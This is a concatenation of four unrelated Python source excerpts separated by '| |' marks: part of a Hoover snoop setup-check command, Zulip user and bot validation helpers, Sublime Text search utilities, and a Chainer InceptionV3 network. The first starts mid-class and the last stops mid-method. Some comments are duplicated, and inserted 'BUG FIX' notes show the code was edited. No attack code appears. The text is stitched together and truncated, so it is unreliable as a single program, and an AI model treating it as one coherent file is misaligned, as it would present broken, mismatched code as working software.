        if have_errors:
            self.print_error("The setup has failed some checks.")
            self.print_error("For more information please see")
            self.print_error("https://github.com/hoover/snoop/blob/master/Readme.md")
            sys.exit(1)
        else:
            self.print_success("All checks have passed.")

    def check_python(self):
        """Require Python 3.5+."""
        if sys.version_info[0] != 3 or sys.version_info[1] < 5:
            self.print_error("The Python version supplied is {}.".format(sys.version))
            self.print_error("Hoover needs at least Python 3.5 to work.")
            self.print_error("Please use a supported version of Python.")
            return False
        return True

    def check_database(self):
        """Verify that the default database connection can be opened."""
        db_conn = connections['default']
        try:
            # Opening a cursor forces a real connection attempt.
            db_conn.cursor()
        except OperationalError:
            self.print_error("The database settings are not valid.")
            self.print_error("Please check the database access data under DATABASES.")
            return False
        return True

    def check_msgconvert(self):
        """Verify the msgconvert script runs and its cache dir exists."""
        msgconvert_path = settings.SNOOP_MSGCONVERT_SCRIPT
        if not path_exists(msgconvert_path):
            self.print_error("You enabled msgconvert support but")
            self.print_error("SNOOP_MSGCONVERT_SCRIPT is not set to a valid path.")
            return False
        version = get_version(msgconvert_path, '--help', regex='(msgconvert)',
                              check_output=False, is_numeric=False)
        if not version:
            # BUG FIX: the message previously read "Could run", dropping "not".
            self.print_error("Could not run the script provided in SNOOP_MSGCONVERT_SCRIPT")
            return False
        cache_dir = settings.SNOOP_MSG_CACHE
        if not cache_dir or not Path(cache_dir).is_dir():
            self.print_error("SNOOP_MSG_CACHE does not point to a valid directory.")
            return False
        return True

    def check_readpst(self):
        """Verify the readpst binary, its version, and its cache dir."""
        readpst_path = settings.SNOOP_READPST_BINARY
        if not path_exists(readpst_path):
            self.print_error("You enabled readpst support but")
            self.print_error("SNOOP_READPST_BINARY is not set to a valid path.")
            return False
        version = get_version(readpst_path, '-V')
        if not version:
            self.print_error("Failed to check the readpst version.")
            self.print_error("Please check if SNOOP_READPST_BINARY points to a valid executable.")
            return False
        if version < PST_MIN_VERSION:
            self.print_error("Please install a more recent version of readpst.")
            return False
        cache_dir = settings.SNOOP_PST_CACHE_ROOT
        if not cache_dir or not Path(cache_dir).is_dir():
            self.print_error("SNOOP_PST_CACHE_ROOT does not point to a valid directory.")
            return False
        return True

    def check_es(self):
        """Verify elasticsearch is reachable and inside the supported
        version range."""
        es_link = settings.SNOOP_ELASTICSEARCH_URL
        content = http_get_content(es_link)
        if not content:
            self.print_error("Could not connect to elasticsearch using")
            self.print_error("the link supplied in SNOOP_ELASTICSEARCH_URL.")
            return False
        try:
            data = json.loads(content)
        except json.JSONDecodeError:
            self.print_error("elasticsearch's response could not be decoded.")
            self.print_error("Please restart the elasticsearch server and try again.")
            return False
        version_string = data['version']['number']
        # Strip any non-numeric suffix (e.g. "-SNAPSHOT") before parsing.
        version_string = re.sub(r'[^\d\.]+', '', version_string)
        version = tuple(int(x) for x in version_string.split('.'))
        if not ELASTICSEARCH_MIN_VERSION <= version <= ELASTICSEARCH_MAX_VERSION:
            self.print_error("elasticsearch is version {}, but".format(version))
            self.print_error("Hoover needs elasticsearch to be in between versions")
            self.print_error("{} and {}".format(ELASTICSEARCH_MIN_VERSION,
                                                ELASTICSEARCH_MAX_VERSION))
            return False
        return True

    def check_tika(self):
        """Verify the Apache Tika server is reachable and recent enough."""
        tika_link = settings.SNOOP_TIKA_SERVER_ENDPOINT
        content = http_get_content(tika_link + "/version")
        if not content:
            self.print_error("Could not connect to Apache Tika using")
            self.print_error("the link supplied in SNOOP_TIKA_SERVER_ENDPOINT.")
            return False
        version_string = str(content)
        matches = re.search(r'([\d\.]+)', version_string, re.MULTILINE)
        if not matches:
            self.print_error("Apache Tika's response did not contain a valid version number.")
            self.print_error("Please restart the Apache Tika server and try again.")
            return False
        version_string = matches.group(1)
        version = tuple(int(x) for x in version_string.split('.'))
        if version < TIKA_MIN_VERSION:
            # BUG FIX: the version placeholder was never filled in
            # (the .format(version) call was missing).
            self.print_error("tika is version {}, but".format(version))
            self.print_error("Hoover needs tika to be at least version {}".format(TIKA_MIN_VERSION))
            self.print_error("Download tika from https://tika.apache.org/download")
            return False
        return True

    def check_7z(self):
        """Verify the 7z binary runs and its cache dir exists."""
        seven_zip_path = settings.SNOOP_SEVENZIP_BINARY
        if not path_exists(seven_zip_path):
            self.print_error("You enabled 7z support but")
            self.print_error("SNOOP_SEVENZIP_BINARY is not set to a valid path.")
            return False
        version = get_version(seven_zip_path, '--help', r'Version +([\d\.]+)', is_numeric=False)
        if not version:
            self.print_error("Failed to check the version for 7z.")
            self.print_error("Please check if SNOOP_SEVENZIP_BINARY points to a valid executable.")
            return False
        cache_dir = settings.SNOOP_ARCHIVE_CACHE_ROOT
        if not cache_dir or not Path(cache_dir).is_dir():
            self.print_error("SNOOP_ARCHIVE_CACHE_ROOT does not point to a valid directory.")
            return False
        return True

    def check_gpg(self):
        """Verify the gpg binary runs and the gpg home dir exists."""
        gpg_path = settings.SNOOP_GPG_BINARY
        if not path_exists(gpg_path):
            self.print_error("You enabled gpg support but")
            self.print_error("SNOOP_GPG_BINARY is not set to a valid path.")
            return False
        version = get_version(gpg_path)
        if not version:
            self.print_error("Failed to check the version for gpg.")
            self.print_error("Please check if SNOOP_GPG_BINARY points to a valid executable.")
            return False
        cache_dir = settings.SNOOP_GPG_HOME
        if not cache_dir or not Path(cache_dir).is_dir():
            self.print_error("SNOOP_GPG_HOME does not point to a valid directory.")
            return False
        return True

    def print_error(self, string):
        self.stdout.write(self.style.ERROR(string))

    def print_message(self, string):
        self.stdout.write(string)

    def print_success(self, string):
        self.stdout.write(self.style.SUCCESS(string))
| |
from typing import Dict, List, Optional, Union, cast
from django.db.models.query import QuerySet
from django.utils.translation import ugettext as _
from django.conf import settings
from zerver.lib.cache import generic_bulk_cached_fetch, user_profile_cache_key_id, \
user_profile_by_id_cache_key
from zerver.lib.request import JsonableError
from zerver.lib.avatar import avatar_url
from zerver.models import UserProfile, Service, Realm, \
get_user_profile_by_id, query_for_ids, get_user_profile_by_id_in_realm, \
CustomProfileField
from zulip_bots.custom_exceptions import ConfigValidationError
def check_full_name(full_name_raw: str) -> str:
    """Strip and validate a user-supplied full name, returning the cleaned
    value; raises JsonableError for names that are too long, too short,
    or contain forbidden characters."""
    full_name = full_name_raw.strip()
    if len(full_name) > UserProfile.MAX_NAME_LENGTH:
        raise JsonableError(_("Name too long!"))
    if len(full_name) < UserProfile.MIN_NAME_LENGTH:
        raise JsonableError(_("Name too short!"))
    if set(full_name).intersection(UserProfile.NAME_INVALID_CHARS):
        raise JsonableError(_("Invalid characters in name!"))
    return full_name
# NOTE: We don't try to absolutely prevent 2 bots from having the same
# name (e.g. you can get there by reactivating a deactivated bot after
# making a new bot with the same name). This is just a check designed
# to make it unlikely to happen by accident.
def check_bot_name_available(realm_id: int, full_name: str) -> None:
    """Raise JsonableError when an active user in the realm already has
    this (stripped) full name."""
    if UserProfile.objects.filter(
            realm_id=realm_id,
            full_name=full_name.strip(),
            is_active=True).exists():
        raise JsonableError(_("Name is already in use!"))
def check_short_name(short_name_raw: str) -> str:
    """Strip a short name (username) and reject empty results."""
    short_name = short_name_raw.strip()
    if not short_name:
        raise JsonableError(_("Bad name or username"))
    return short_name
def check_valid_bot_config(service_name: str, config_data: Dict[str, str]) -> None:
    """Ask the embedded bot's handler (when it defines validate_config) to
    validate config_data, converting failures into JsonableError."""
    try:
        from zerver.lib.bot_lib import get_bot_handler
        bot_handler = get_bot_handler(service_name)
        validate = getattr(bot_handler, 'validate_config', None)
        if validate is not None:
            validate(config_data)
    except ConfigValidationError:
        # The exception provides a specific error message, but that
        # message is not tagged translatable, because it is
        # triggered in the external zulip_bots package.
        # TODO: Think of some clever way to provide a more specific
        # error message.
        raise JsonableError(_("Invalid configuration data!"))
# Adds an outgoing webhook or embedded bot service.
def add_service(name: str, user_profile: UserProfile, base_url: Optional[str]=None,
                interface: Optional[int]=None, token: Optional[str]=None) -> None:
    """Create a Service row describing an outgoing webhook / embedded bot."""
    fields = dict(name=name,
                  user_profile=user_profile,
                  base_url=base_url,
                  interface=interface,
                  token=token)
    Service.objects.create(**fields)
def check_bot_creation_policy(user_profile: UserProfile, bot_type: int) -> None:
    """Enforce the realm's bot_creation_policy for this user and bot type;
    raises JsonableError when creation is not allowed."""
    # Realm administrators can always add bot
    if user_profile.is_realm_admin:
        return
    policy = user_profile.realm.bot_creation_policy
    if policy == Realm.BOT_CREATION_EVERYONE:
        return
    if policy == Realm.BOT_CREATION_ADMINS_ONLY:
        raise JsonableError(_("Must be an organization administrator"))
    if policy == Realm.BOT_CREATION_LIMIT_GENERIC_BOTS and \
            bot_type == UserProfile.DEFAULT_BOT:
        raise JsonableError(_("Must be an organization administrator"))
def check_valid_bot_type(user_profile: UserProfile, bot_type: int) -> None:
    """Reject bot types the requesting user may not create."""
    if bot_type in user_profile.allowed_bot_types:
        return
    raise JsonableError(_('Invalid bot type'))
def check_valid_interface_type(interface_type: Optional[int]) -> None:
    """Reject Service interface types outside the allowed set."""
    if interface_type in Service.ALLOWED_INTERFACE_TYPES:
        return
    raise JsonableError(_('Invalid interface type'))
def bulk_get_users(emails: List[str], realm: Optional[Realm],
                   base_query: 'QuerySet[UserProfile]'=None) -> Dict[str, UserProfile]:
    """Fetch active UserProfiles for `emails` (case-insensitively),
    going through a per-email cache; returns a dict keyed by
    lower-cased email."""
    if base_query is None:
        assert realm is not None
        query = UserProfile.objects.filter(realm=realm, is_active=True)
        realm_id = realm.id
    else:
        # WARNING: Currently, this code path only really supports one
        # version of `base_query` being used (because otherwise,
        # they'll share the cache, which can screw up the filtering).
        # If you're using this flow, you'll need to re-do any filters
        # in base_query in the code itself; base_query is just a perf
        # optimization.
        query = base_query
        realm_id = 0

    def fetch_users_by_email(emails: List[str]) -> List[UserProfile]:
        # This should be just
        #
        # UserProfile.objects.select_related("realm").filter(email__iexact__in=emails,
        #                                                    realm=realm)
        #
        # But chaining __in and __iexact doesn't work with Django's
        # ORM, so we have the following hack to construct the relevant where clause
        if len(emails) == 0:
            return []

        upper_list = ", ".join(["UPPER(%s)"] * len(emails))
        where_clause = "UPPER(zerver_userprofile.email::text) IN (%s)" % (upper_list,)
        return query.select_related("realm").extra(
            where=[where_clause],
            params=emails)

    return generic_bulk_cached_fetch(
        # Use a separate cache key to protect us from conflicts with
        # the get_user cache.
        lambda email: 'bulk_get_users:' + user_profile_cache_key_id(email, realm_id),
        fetch_users_by_email,
        [email.lower() for email in emails],
        id_fetcher=lambda user_profile: user_profile.email.lower()
    )
def user_ids_to_users(user_ids: List[int], realm: Realm) -> List[UserProfile]:
    """Bulk-fetch the UserProfile rows for user_ids, validating that every
    id exists and belongs to `realm`; raises JsonableError otherwise."""
    # TODO: Consider adding a flag to control whether deactivated
    # users should be included.

    def fetch_users_by_id(user_ids: List[int]) -> List[UserProfile]:
        if len(user_ids) == 0:
            return []

        return list(UserProfile.objects.filter(id__in=user_ids).select_related())

    user_profiles_by_id = generic_bulk_cached_fetch(
        cache_key_function=user_profile_by_id_cache_key,
        query_function=fetch_users_by_id,
        object_ids=user_ids
    )  # type: Dict[int, UserProfile]

    found_user_ids = user_profiles_by_id.keys()
    missed_user_ids = [user_id for user_id in user_ids if user_id not in found_user_ids]
    if missed_user_ids:
        # BUG FIX: interpolate *after* translation; `_("%s" % x)` looks up
        # the already-interpolated string in the catalog and so defeats
        # translation.
        raise JsonableError(_("Invalid user ID: %s") % (missed_user_ids[0],))

    user_profiles = list(user_profiles_by_id.values())
    for user_profile in user_profiles:
        if user_profile.realm != realm:
            raise JsonableError(_("Invalid user ID: %s") % (user_profile.id,))
    return user_profiles
def access_bot_by_id(user_profile: UserProfile, user_id: int) -> UserProfile:
    """Fetch a bot by id in user_profile's realm, verifying it exists, is a
    bot, and that user_profile may administer it."""
    try:
        bot = get_user_profile_by_id_in_realm(user_id, user_profile.realm)
    except UserProfile.DoesNotExist:
        raise JsonableError(_("No such bot"))
    if not bot.is_bot:
        raise JsonableError(_("No such bot"))
    if not user_profile.can_admin_user(bot):
        raise JsonableError(_("Insufficient permission"))
    return bot
def access_user_by_id(user_profile: UserProfile, user_id: int,
                      allow_deactivated: bool=False, allow_bots: bool=False) -> UserProfile:
    """Look up a user by ID in the requester's realm.

    Raises JsonableError unless the target exists, passes the
    bot/deactivation filters, and `user_profile` may administer it.
    """
    try:
        user = get_user_profile_by_id_in_realm(user_id, user_profile.realm)
    except UserProfile.DoesNotExist:
        raise JsonableError(_("No such user"))

    # Guard clauses, cheapest first.
    if not allow_bots and user.is_bot:
        raise JsonableError(_("No such user"))
    if not allow_deactivated and not user.is_active:
        raise JsonableError(_("User is deactivated"))
    if not user_profile.can_admin_user(user):
        raise JsonableError(_("Insufficient permission"))

    return user
def get_accounts_for_email(email: str) -> List[Dict[str, Optional[str]]]:
    """Return summary data for every active, human account with this
    delivery email (case-insensitive), across all non-deactivated realms,
    ordered by signup date."""
    profiles = (UserProfile.objects
                .select_related('realm')
                .filter(delivery_email__iexact=email.strip(),
                        is_active=True,
                        is_bot=False,
                        realm__deactivated=False)
                .order_by('date_joined'))
    accounts = []
    for profile in profiles:
        accounts.append({
            "realm_name": profile.realm.name,
            "string_id": profile.realm.string_id,
            "full_name": profile.full_name,
            "avatar": avatar_url(profile),
        })
    return accounts
def get_api_key(user_profile: UserProfile) -> str:
    """Return the user's API key."""
    return user_profile.api_key
def get_all_api_keys(user_profile: UserProfile) -> List[str]:
    """Return every API key belonging to the user.

    Users can only have one API key for now, so this is always a
    single-element list.
    """
    return [user_profile.api_key]
def validate_user_custom_profile_data(realm_id: int,
                                      profile_data: List[Dict[str, Union[int, str, List[int]]]]) -> None:
    """Validate each submitted custom-profile-field value against the
    type of its field, raising JsonableError on the first failure."""
    for item in profile_data:
        field_id = item['id']
        try:
            field = CustomProfileField.objects.get(id=field_id)
        except CustomProfileField.DoesNotExist:
            raise JsonableError(_('Field id {id} not found.').format(id=field_id))

        field_type = field.field_type
        var_name = '{}'.format(field.name)
        value = item['value']

        # Dispatch on the field type: simple scalar types share a
        # validator table; choice and user fields need extra context.
        simple_validators = CustomProfileField.FIELD_VALIDATORS
        if field_type in simple_validators:
            result = simple_validators[field_type](var_name, value)
        elif field_type == CustomProfileField.CHOICE:
            result = CustomProfileField.CHOICE_FIELD_VALIDATORS[field_type](
                var_name, field.field_data, value)
        elif field_type == CustomProfileField.USER:
            result = CustomProfileField.USER_FIELD_VALIDATORS[field_type](
                realm_id, cast(List[int], value), False)
        else:
            raise AssertionError("Invalid field type")

        # Validators return None on success, or an error string.
        if result is not None:
            raise JsonableError(result)
| |
import sublime
import sublime_plugin
import re
def find_in_range(view, term, start, end, flags=0):
    """Return the first match of `term` at or after `start` whose end does
    not exceed `end`; implicitly return None otherwise.

    NOTE(review): on some Sublime API versions view.find() reports a
    failed search as Region(-1, -1), which is truthy and has b == -1, so
    it can pass the `found.b <= end` test and be returned here; callers
    such as find_all_in_range() check for that sentinel explicitly.
    """
    found = view.find(term, start, flags)
    if found and found.b <= end:
        return found
def find_all_in_range(view, term, start, end, flags=0):
    """Collect every non-overlapping match of `term` fully contained in
    [start, end], scanning forward from each previous match's end."""
    results = []
    while True:
        match = find_in_range(view, term, start, end, flags)
        # Stop on the Region(-1, -1) failure sentinel, on None, or when
        # the match leaks outside the requested range.
        if match == sublime.Region(-1, -1) or not match:
            break
        if match.begin() < start or match.end() > end:
            break
        results.append(match)
        start = match.end()
    return results
def find_wrapping(view, term, start, end, flags=0, times=1):
    """Find the `times`-th forward match of `term`, wrapping around the
    end of the buffer at most once (restarting from 0 up to the caret).

    Implicitly returns None when no match exists.
    """
    current_sel = view.sel()[0]
    # Search wrapping around the end of the buffer.
    for x in range(times):
        match = find_in_range(view, term, start, end, flags)
        # Start searching in the upper half of the buffer if we aren't doing it yet.
        if not match and start > current_sel.b:
            start = 0
            end = current_sel.a
            match = find_in_range(view, term, start, end, flags)
            if not match:
                # Wrapped and still nothing: the term is not in the buffer.
                return
        # No luck in the whole buffer.
        elif not match:
            return
        # Continue the next iteration just past this match.
        start = match.b
    return match
def reverse_find_wrapping(view, term, start, end, flags=0, times=1):
    """Find the `times`-th backward match of `term`, wrapping around the
    start of the buffer at most once (restarting from the caret down to
    the end of the buffer).

    Implicitly returns None when no match exists.
    """
    current_sel = view.sel()[0]
    # Search wrapping around the end of the buffer.
    for x in range(times):
        match = reverse_search(view, term, start, end, flags)
        # Start searching in the lower half of the buffer if we aren't doing it yet.
        if not match and start <= current_sel.b:
            start = current_sel.b
            end = view.size()
            match = reverse_search(view, term, start, end, flags)
            if not match:
                # Wrapped and still nothing: the term is not in the buffer.
                return
        # No luck in the whole buffer.
        elif not match:
            return
        # Continue the next iteration just before this match.
        end = match.a
    return match
def find_last_in_range(view, term, start, end, flags=0):
    """Return the last match of `term` within [start, end], walking
    forward match by match; None when there is no match at all."""
    current = find_in_range(view, term, start, end, flags)
    last = current
    while current:
        current = find_in_range(view, term, current.b, end, flags)
        if not current or current.b > end:
            break
        last = current
    return last
# reverse search
# reverse search
def reverse_search(view, term, start, end, flags=0):
    """Find the last match of `term` in [start, end] by bisecting the
    buffer on whole-line boundaries: keep narrowing to the half that
    still contains a match, preferring the later half, until a single
    line remains; then scan that line for its last match.

    Returns None when there is no match, or when the bounds are invalid.
    """
    assert isinstance(start, int) or start is None
    assert isinstance(end, int) or end is None

    # Default to the whole buffer.
    start = start if (start is not None) else 0
    end = end if (end is not None) else view.size()

    if start < 0 or end > view.size():
        return None

    lo_line = view.full_line(start)
    hi_line = view.full_line(end)

    while True:
        low_row, hi_row = view.rowcol(lo_line.a)[0], view.rowcol(hi_line.a)[0]
        middle_row = (low_row + hi_row) // 2
        middle_line = view.full_line(view.text_point(middle_row, 0))
        # Split the remaining span at the middle line's end.
        lo_region = sublime.Region(lo_line.a, middle_line.b)
        hi_region = sublime.Region(middle_line.b, min(hi_line.b, end))
        # Check the later half first: we want the *last* match.
        if find_in_range(view, term, hi_region.a, hi_region.b, flags):
            lo_line = view.full_line(middle_line.b)
        elif find_in_range(view, term, lo_region.a, lo_region.b, flags):
            hi_line = view.full_line(middle_line.a)
        else:
            return None

        if lo_line == hi_line:
            # we found the line we were looking for, now extract the match.
            return find_last_in_range(view, term, hi_line.a, min(hi_line.b, end), flags)
def reverse_search_by_pt(view, term, start, end, flags=0):
    """Like reverse_search(), but the final line scan is additionally
    clamped to begin no earlier than `start` (`max(hi_line.a, start)`),
    so a match before `start` on the same line is never returned.

    NOTE(review): this is otherwise a byte-for-byte duplicate of
    reverse_search() — a candidate for merging once both call sites are
    understood.
    """
    assert isinstance(start, int) or start is None
    assert isinstance(end, int) or end is None

    # Default to the whole buffer.
    start = start if (start is not None) else 0
    end = end if (end is not None) else view.size()

    if start < 0 or end > view.size():
        return None

    lo_line = view.full_line(start)
    hi_line = view.full_line(end)

    while True:
        low_row, hi_row = view.rowcol(lo_line.a)[0], view.rowcol(hi_line.a)[0]
        middle_row = (low_row + hi_row) // 2
        middle_line = view.full_line(view.text_point(middle_row, 0))
        # Split the remaining span at the middle line's end.
        lo_region = sublime.Region(lo_line.a, middle_line.b)
        hi_region = sublime.Region(middle_line.b, min(hi_line.b, end))
        # Check the later half first: we want the *last* match.
        if find_in_range(view, term, hi_region.a, hi_region.b, flags):
            lo_line = view.full_line(middle_line.b)
        elif find_in_range(view, term, lo_region.a, lo_region.b, flags):
            hi_line = view.full_line(middle_line.a)
        else:
            return None

        if lo_line == hi_line:
            # we found the line we were looking for, now extract the match.
            return find_last_in_range(view, term, max(hi_line.a, start), min(hi_line.b, end), flags)
# TODO: Test me.
# TODO: Test me.
class BufferSearchBase(sublime_plugin.TextCommand):
    """Base text command providing buffer-wide search helpers."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def calculate_flags(self):
        # TODO: Implement smartcase?
        flags = 0
        settings = self.view.settings()
        if settings.get('vintageous_magic') == False:
            flags |= sublime.LITERAL
        if settings.get('vintageous_ignorecase') == True:
            flags |= sublime.IGNORECASE
        return flags

    def build_pattern(self, query):
        # Subclasses may transform the raw query; by default it is used as-is.
        return query

    def hilite(self, query):
        """Highlight every match of `query`, or clear the highlight
        regions when there is none."""
        pattern = self.build_pattern(query)
        regions = self.view.find_all(pattern, self.calculate_flags())
        if not regions:
            self.view.erase_regions('vi_search')
            return

        # TODO: Re-enable this.
        # if State(self.view).settings.vi['hlsearch'] == False:
        #     return

        self.view.add_regions('vi_search', regions, 'comment', '',
                              sublime.DRAW_NO_FILL)
# TODO: Test me.
# TODO: Test me.
class ExactWordBufferSearchBase(BufferSearchBase):
    """Search base that matches the word under the caret as a whole word."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def calculate_flags(self):
        # Word searches only honor case sensitivity; LITERAL never applies.
        if self.view.settings().get('vintageous_ignorecase') == True:
            return sublime.IGNORECASE
        return 0

    def get_query(self):
        # TODO: make sure we swallow any leading white space.
        caret = self.view.sel()[0].end()
        return self.view.substr(self.view.word(caret))

    def build_pattern(self, query):
        # Anchor the (escaped) query at word boundaries.
        return r'\b{0}\b'.format(re.escape(query))
| |
from chainer.functions.array import concat
from chainer.functions.loss import softmax_cross_entropy as S
from chainer.functions.noise import dropout
from chainer.functions.pooling import average_pooling_2d as A
from chainer.functions.pooling import max_pooling_2d as M
from chainer import link
from chainer.links.connection import convolution_2d as C
from chainer.links.connection import linear
from chainer.links.normalization import batch_normalization as B
class AuxConv(link.Chain):
    """Convolution with optional preceding pooling and following batch
    normalization.

    Args:
        conv: a Convolution2D link; its output channel count is read from
            ``conv.W.data.shape[0]`` to size the batch-normalization link.
        batch_norm (bool): add a BatchNormalization child link when True.
        pool: optional callable applied to the input before the convolution.
    """

    def __init__(self, conv, batch_norm=True, pool=None):
        super(AuxConv, self).__init__(conv=conv)
        # Remember the choice: the child link only exists when requested.
        self.use_batch_norm = batch_norm
        if batch_norm:
            out_channel = conv.W.data.shape[0]
            self.add_link('batch_norm',
                          B.BatchNormalization(out_channel))
        self.pool = pool

    def __call__(self, x, train=True):
        if self.pool:
            x = self.pool(x)
        x = self.conv(x)
        # Bug fix: the original tested `self.batch_norm` unconditionally,
        # which raises AttributeError when constructed with
        # batch_norm=False, because the child link was never registered.
        if self.use_batch_norm:
            x = self.batch_norm(x, test=not train)
        return x
class Sequential(link.ChainList):
    """Applies its child links one after another, feeding each output
    into the next link."""

    def __call__(self, x, *args, **kwargs):
        h = x
        for child in self:
            h = child(h, *args, **kwargs)
        return h
class Inception(link.ChainList):
    """Applies every child link to the same input in parallel and
    concatenates their outputs along the channel axis.

    Keyword Args:
        pool: optional callable whose output on the raw input is appended
            as an extra branch.
    """

    def __init__(self, *links, **kw):
        super(Inception, self).__init__(*links)
        self.pool = kw.get('pool', None)

    def __call__(self, x, train=True):
        branches = [branch(x, train) for branch in self]
        if self.pool:
            branches.append(self.pool(x))
        return concat.concat(branches)
class InceptionV3(link.Chain):
    """Inception V3.

    http://arxiv.org/abs/1512.00567
    https://github.com/tensorflow/models/blob/master/inception/inception/slim/inception_model.py
    """

    def __init__(self, use_cudnn=True):
        # Stem: plain convolutions taking the 3-channel input to 192 channels.
        convolution = link.ChainList(
            AuxConv(C.Convolution2D(3, 32, 3, 2, use_cudnn=use_cudnn)),
            AuxConv(C.Convolution2D(32, 32, 3, use_cudnn=use_cudnn)),
            AuxConv(C.Convolution2D(32, 64, 3, 1, 1, use_cudnn=use_cudnn)),
            AuxConv(C.Convolution2D(64, 80, 3, 1, 1, use_cudnn=use_cudnn)),
            AuxConv(C.Convolution2D(80, 192, 3, use_cudnn=use_cudnn)))

        def inception_0(input_channel, pool_channel):
            # Module with 1x1, 5x5, double-3x3 and pooled branches.
            # 1x1
            s1 = AuxConv(C.Convolution2D(input_channel, 64, 1, use_cudnn=use_cudnn))
            # 5x5
            s21 = AuxConv(C.Convolution2D(input_channel, 48, 1, use_cudnn=use_cudnn))
            s22 = AuxConv(C.Convolution2D(48, 64, 5, pad=2, use_cudnn=use_cudnn))
            s2 = Sequential(s21, s22)
            # double 3x3
            s31 = AuxConv(C.Convolution2D(input_channel, 64, 1, use_cudnn=use_cudnn))
            s32 = AuxConv(C.Convolution2D(64, 96, 3, pad=1, use_cudnn=use_cudnn))
            s33 = AuxConv(C.Convolution2D(96, 96, 3, pad=1, use_cudnn=use_cudnn))
            s3 = Sequential(s31, s32, s33)
            # pool
            s4 = AuxConv(C.Convolution2D(input_channel,
                                         pool_channel, 3, pad=1, use_cudnn=use_cudnn),
                         pool=M.MaxPooling2D(3, 1, 1, use_cudnn=use_cudnn))
            return Inception(s1, s2, s3, s4)
        inception0 = Sequential(*[inception_0(input_channel, pool_channel)
                                  for input_channel, pool_channel
                                  in zip([192, 256, 288], [32, 64, 64])])

        # First grid-size reduction (applied between the 35x35 and 17x17
        # stages in __call__).
        grid_reduction0 = Inception(
            # strided 3x3
            AuxConv(C.Convolution2D(288, 384, 3, 2, use_cudnn=use_cudnn)),
            # double 3x3
            Sequential(
                AuxConv(C.Convolution2D(288, 64, 1, use_cudnn=use_cudnn)),
                AuxConv(C.Convolution2D(64, 96, 3, pad=1, use_cudnn=use_cudnn)),
                AuxConv(C.Convolution2D(96, 96, 3, 2, use_cudnn=use_cudnn))),
            # pool
            pool=M.MaxPooling2D(3, 2))

        def inception_1(hidden_channel):
            # Module with factorized 7x7 branches (1x7 followed by 7x1).
            # 1x1
            s1 = AuxConv(C.Convolution2D(768, 192, 1, use_cudnn=use_cudnn))
            # 7x7
            s21 = AuxConv(C.Convolution2D(768, hidden_channel, 1, use_cudnn=use_cudnn))
            s22 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (1, 7), pad=(0, 3), use_cudnn=use_cudnn))
            s23 = AuxConv(C.Convolution2D(hidden_channel, 192, (7, 1), pad=(3, 0), use_cudnn=use_cudnn))
            s2 = Sequential(s21, s22, s23)
            # double 7x7
            s31 = AuxConv(C.Convolution2D(768, hidden_channel, 1, use_cudnn=use_cudnn))
            s32 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (1, 7), pad=(0, 3), use_cudnn=use_cudnn))
            s33 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (7, 1), pad=(3, 0), use_cudnn=use_cudnn))
            s34 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (1, 7), pad=(0, 3), use_cudnn=use_cudnn))
            s35 = AuxConv(C.Convolution2D(hidden_channel, 192, (7, 1), pad=(3, 0), use_cudnn=use_cudnn))
            s3 = Sequential(s31, s32, s33, s34, s35)
            # pool
            s4 = AuxConv(C.Convolution2D(768, 192, 3, pad=1, use_cudnn=use_cudnn),
                         pool=A.AveragePooling2D(3, 1, 1, use_cudnn=use_cudnn))
            return Inception(s1, s2, s3, s4)
        inception1 = Sequential(*[inception_1(c)
                                  for c in [128, 160, 160, 192]])

        # Second grid-size reduction (17x17 -> 8x8 stage in __call__).
        grid_reduction1 = Inception(
            # strided 3x3
            Sequential(
                AuxConv(C.Convolution2D(768, 192, 1, use_cudnn=use_cudnn)),
                AuxConv(C.Convolution2D(192, 320, 3, 2, use_cudnn=use_cudnn))),
            # 7x7 and 3x3
            Sequential(
                AuxConv(C.Convolution2D(768, 192, 1, use_cudnn=use_cudnn)),
                AuxConv(C.Convolution2D(192, 192, (1, 7), pad=(0, 3), use_cudnn=use_cudnn)),
                AuxConv(C.Convolution2D(192, 192, (7, 1), pad=(3, 0), use_cudnn=use_cudnn)),
                AuxConv(C.Convolution2D(192, 192, 3, 2, use_cudnn=use_cudnn))),
            # pool
            pool=M.MaxPooling2D(3, 2, use_cudnn=use_cudnn))

        def inception_2(input_channel):
            # Module whose 3x3 branches fan out into parallel 1x3/3x1 pairs.
            # 1x1
            s1 = AuxConv(C.Convolution2D(input_channel, 320, 1, use_cudnn=use_cudnn))
            # 3x3
            s21 = AuxConv(C.Convolution2D(input_channel, 384, 1, use_cudnn=use_cudnn))
            s22 = Inception(AuxConv(C.Convolution2D(384, 384, (1, 3),
                                                    pad=(0, 1), use_cudnn=use_cudnn)),
                            AuxConv(C.Convolution2D(384, 384, (3, 1),
                                                    pad=(1, 0), use_cudnn=use_cudnn)))
            s2 = Sequential(s21, s22)
            # double 3x3
            s31 = AuxConv(C.Convolution2D(input_channel, 448, 1, use_cudnn=use_cudnn))
            s32 = AuxConv(C.Convolution2D(448, 384, 3, pad=1, use_cudnn=use_cudnn))
            s331 = AuxConv(C.Convolution2D(384, 384, (1, 3), pad=(0, 1), use_cudnn=use_cudnn))
            s332 = AuxConv(C.Convolution2D(384, 384, (3, 1), pad=(1, 0), use_cudnn=use_cudnn))
            s33 = Inception(s331, s332)
            s3 = Sequential(s31, s32, s33)
            # pool
            s4 = AuxConv(C.Convolution2D(input_channel, 192, 3, pad=1, use_cudnn=use_cudnn),
                         pool=A.AveragePooling2D(3, 1, 1, use_cudnn=use_cudnn))
            return Inception(s1, s2, s3, s4)
        inception2 = Sequential(*[inception_2(input_channel)
                                  for input_channel in [1280, 2048]])

        # Auxiliary classifier head, attached to the 768-channel stage.
        auxiliary_convolution = Sequential(
            AuxConv(C.Convolution2D(768, 128, 1, use_cudnn=use_cudnn),
                    pool=A.AveragePooling2D(5, 3, use_cudnn=use_cudnn)),
            AuxConv(C.Convolution2D(128, 768, 5, use_cudnn=use_cudnn)))

        super(InceptionV3, self).__init__(
            convolution=convolution,
            inception=link.ChainList(inception0, inception1, inception2),
            grid_reduction=link.ChainList(grid_reduction0, grid_reduction1),
            auxiliary_convolution=auxiliary_convolution,
            auxiliary_linear=linear.Linear(768, 1000),
            linear=linear.Linear(2048, 1000))

    def __call__(self, x, train=True):
        """Computes the output of the module.

        Args:
            x(~chainer.Variable): Input variable.

        Returns:
            Tuple of (main logits, auxiliary-classifier logits).
        """
        def convolution(x, train):
